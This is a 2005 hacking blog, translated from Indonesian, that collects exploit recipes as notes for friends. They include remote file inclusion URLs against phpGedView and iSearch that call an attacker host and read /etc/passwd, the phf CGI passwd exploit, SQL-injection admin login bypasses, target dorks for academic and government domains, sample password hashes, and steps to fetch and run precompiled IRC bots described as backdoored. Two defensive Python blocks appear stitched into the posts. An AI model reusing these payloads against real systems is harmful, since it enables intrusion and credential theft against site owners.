Friday, December 23, 2005

Syaloom

A friend gave me an old saying from China

Sun-Tzu:"If the enemy leaves a door open, you must rush in."

Which means:

If the enemy leaves the door open, we must charge in!

That saying reminded me of some time ago, when I first learned to set up a psyBNC/bot; the effort and the complicated compilation process pushed me to look for a script that was already compiled.

My search ended when I found Chanarybot/ChanaryPSY (from channel #chanary@DALnet), whose build was so impressive (in my opinion at the time).

After quite a (very, very) long time I finally realized that both contain a backdoor that runs without our knowledge, logging in to our psy/bot access and doing things we never imagined.

<fazar>Sun-Tzu:"If the enemy leaves a door open, you must rush in."
<fazar>If the enemy leaves the door open, we must charge in!
<fazar>;)
<anak-rimba>whoa, what is that
<anak-rimba>that's called a backdoor, mas

It is not the fault of whoever built the backdoor if your password is stolen, because you used/obtained the script for free without checking it first.

Government Warning:
- Read the terms of use; if you disagree with someone else's script, feel free to EDIT it yourself, of course without removing the author's note.


How To 9

PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior

Description:
PHP remote code injection vulnerability in the GEDCOM configuration script for phpGedView 2.65.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains a malicious theme.php script.

External References:
Mitre CVE: CAN-2004-0128
BUGTRAQ: 20040129 PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior

Summary:
phpGedView is an open source system for online viewing of GEDCOM information (family tree and genealogy information). Multiple PHP code injection vulnerabilities exist in the phpGedView product. They enable a malicious user to execute commands on the server.

Release Date:
January 29 2004

Severity:
High

SecureScout Testcase ID:
TC 17868 (Still in Development)

Vulnerable Systems:
phpGedView version 2.65.1 and prior

Vulnerability Type:
PHP Injection - forces the target to execute a PHP file from the attacker's server

Vendor Status:
The vendor has been notified and has released version 2.65.3, which fixes the problem.

Example:
(HIGH risk; no authentication needed)

-- HTTP Request --

http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/

-- HTTP Request --

Code impacted: [GED_File]_conf.php

    if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php"))
        require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
    else {
        $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
        require($THEME_DIR."theme.php");
    }

The require call is only vulnerable when PHP register_globals is On.

In this case you have to obtain the name of the GEDCOM file in use. Just perform a request for http://[target]/session.php; the GEDCOM file name will appear in the argument of the login.php call.

The attacker has to create on his web site a directory called themes/standard, and a file theme.php.

For example: theme.php =

and the request will execute the phpinfo() command on the vulnerable target.

Credits:
Cedric Cochin - netVigilance Vulnerability Research team


Tuesday, December 13, 2005

Thanks To Anymous

Say: thanks to Anymous for your comment.

Your suggestion regarding the PoC is noted; I will try to provide a good PoC format, because this blog is not a security focus/hacking tutorial, just a note for friends who need it.

One thing to remember: I am not the one who found these bugs/exploits; I only assemble, I am not the author. Like a bomb: I cannot make RDX/C4, I only assemble.

But all of your suggestions will be taken on board.

Thanks.


Friday, December 09, 2005

How To 8

'isearch.inc.php' includes the following files relative to the user-supplied $isearch_path variable:

isearch_core.inc.php
isearch_spider.inc.php
isearch_search.inc.php

A remote user can reportedly supply a specially crafted URL that will include arbitrary PHP code from a remote location and execute the code on the target system. The code, including operating system commands, will execute with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/isearch/isearch.inc.php?isearch_path=http://[attacker]?&cmd=cat /etc/passwd

The author indicates that this vulnerability was reported by blackcobra-x.

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

Solution: No solution was available at the time of this entry.

Vendor URL: www.isearchthenet.com/isearch/index.php

Cause: Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: taktau@taktau.cc
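Both the phpGedView advisory (How To 9) and the iSearch advisory (How To 8) above hinge on an include path taken from the query string and pointed at a remote host. The following is an added example, not code from either project: it flags such requests in web server access logs and shows the defensive check that the vulnerable require() lacked. The parameter names come from the two advisories; the log lines, hosts and install path are constructed placeholders.

```python
import re
from pathlib import Path
from urllib.parse import parse_qsl, urlsplit

# Query parameters the two advisories above show being pointed at a remote
# host (constructed list; extend it per application).
INCLUDE_PARAMS = {"PGV_BASE_DIRECTORY", "THEME_DIR", "isearch_path"}
REMOTE_SCHEME = re.compile(r"^\s*(https?|ftp)://", re.IGNORECASE)
# Combined-log prefix: client, method, request target, status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log; hosts and paths are placeholders, not real IoCs.
ACCESS_LOG = """\
203.0.113.5 - - [29/Jan/2004:10:00:01 +0000] "GET /pgv/index/demo_conf.php?PGV_BASE_DIRECTORY=http://attacker.example/&THEME_DIR=/ HTTP/1.0" 200 512
198.51.100.7 - - [29/Jan/2004:10:00:02 +0000] "GET /pgv/index.php?ged=demo HTTP/1.0" 200 8192
203.0.113.5 - - [09/Dec/2005:12:30:00 +0000] "GET /isearch/isearch.inc.php?isearch_path=http://attacker.example/?&cmd=id HTTP/1.1" 200 300
"""

def remote_include_params(request_target):
    """Names of include-path parameters whose value is a remote URL."""
    query = urlsplit(request_target).query
    return [k for k, v in parse_qsl(query, keep_blank_values=True)
            if k in INCLUDE_PARAMS and REMOTE_SCHEME.match(v)]

def scan_access_log(text):
    """Return (client, target, flagged params) for every RFI-looking request."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        flagged = remote_include_params(target)
        if flagged:
            hits.append((client, target, flagged))
    return hits

def local_theme_path(install_root, base_dir, theme_dir):
    """Hardened counterpart of the vulnerable require(): accept theme.php only
    if the user-influenced path still resolves inside the install directory."""
    root = Path(install_root).resolve()
    candidate = (root / base_dir / theme_dir / "theme.php").resolve()
    return str(candidate) if root in candidate.parents else None

if __name__ == "__main__":
    for client, target, flagged in scan_access_log(ACCESS_LOG):
        print(f"{client} -> {flagged} in {target}")
```

A remote URL in `PGV_BASE_DIRECTORY` or an absolute `THEME_DIR` both fail `local_theme_path`, which is the property the original require() should have enforced even with register_globals on.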


Tuesday, December 06, 2005

Telnet Chat

Chat on IRC:
but no mIRC, no BitchX, no XChat.

Use telnet:

set localecho
irc.telkom.net.id 6667
USER Idnet localhost localhost :Real
NICK nick
JOIN #kecoak
PART #
PRIVMSG # :message
PRIVMSG :message
QUIT :

Why telnet? Because 99.9% of the time you can find it on every OS, so use this only in an emergency situation!


Monday, December 05, 2005

How To 4

altavista Dorks :
host:ac.il

http://[target]/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd

Encrypted passwd:
root:2/.,1wEYqm3m3Q:Root Account:/:/bin/csh

Unencrypted/unshadowed passwd:
root:OUk9b8RqMRVNs:0:0:root,,,,,,,:/:/bin/csh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
leonid:F5AymuqmXVFCU:1399:8:Leonid Bebek:/usr/leonid:/bin/tcsh

A password cracker program works roughly like this:

1. read word #1 from the dictionary/wordlist file
2. encrypt it with the DES algorithm
3. read line 1 of the passwd file (account 1): the account name and the encrypted password
4. compare whether encrypted word #1 = encrypted passwd 1
5. yes? notify the user / write it to the log; no? read line 2 of the passwd file, and so on.

Another Link
ac.jp (Japanese academic)
ac.kr (Korean academic)
.edu (US academic)
ac.uk (UK academic)
go.kr (Korean government)
go.in (Indian government)
ac.ir (Iranian academic)
com.il (Israeli commercial) etc. etc.


BOT Precompile

http://h1.ripway.com/xgoogle/zregbot.tar.tar
tar
rm zregbot.tar.tar
cd
cd scripts
http://home.ripway.com/2005-2/261717/buhamtcl.txt
mv ary.tcl
./nadya PID nickbot ident ip channel owner


irc-CGI


How To 5

The Guestbook 2.2 web application (PHP, MySQL) appears vulnerable to SQL injection, granting the attacker administrator access.

Target :

http://www.example.com/[GuestbookTarget]/admin.php

Username: ' or 1=1 /*
Password: (Nothing)(Blank)


It works on Advanced Guestbook 2.2; version 2.3.1 will fix this vulnerability.


PsyBNC Precompile

http://channels.dal.net/bodi/irc/prepsybnc.tar.gz
tar
rm prepsybnc.tar.gz
mv psybnc
cd
rm scripts/DEFAULT.SCRIPT
ps
./kik "process" ./psybnc
/sbin/ifconfig | grep inet
cat /etc/hosts
ls -FRla | grep drwxrwxrwx


How To 2

1-2-All Broadcast E-mail Software (PoC)
Supplying the following is sufficient to gain access to the admin control panel:

Target :

http://www.example.com/[12allTarget]/admin/index.php


Username: ' or 1=1 /*
Password: (Nothing)(Blank)
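The admin login bypass shown for Advanced Guestbook (How To 5) and for 1-2-All (How To 2) works whenever the login query is built by string concatenation. This added example (not code from either product; the table and credentials are constructed, and the concatenated query is an assumed pattern, since the products' own code is not on the page) reproduces the bypass against an in-memory SQLite table and shows the parameterized form that defeats it:

```python
import sqlite3

# Constructed in-memory stand-in for an application's admin table.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES ('admin', 's3cret')")
    return db

def login_vulnerable(db, username, password):
    """Query built by string concatenation (assumed pattern). The quote in the
    input closes the literal, 'or 1=1' makes the WHERE clause true for every
    row, and '/*' comments out the password check that follows."""
    sql = ("SELECT username FROM admin WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_hardened(db, username, password):
    """Same query with bound parameters: the input is only ever data, so the
    quote and comment characters never reach the SQL parser as syntax."""
    row = db.execute(
        "SELECT username FROM admin WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    bypass = "' or 1=1 /*"           # the username from the PoCs above
    print("vulnerable:", login_vulnerable(db, bypass, ""))
    print("hardened:  ", login_hardened(db, bypass, ""))
```

Fixing the query is the real remedy; the "version 2.3.1 will fix this" note above is only useful to operators who actually upgrade, so checking login handlers for concatenated SQL is the check to run across every PHP application on the host.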

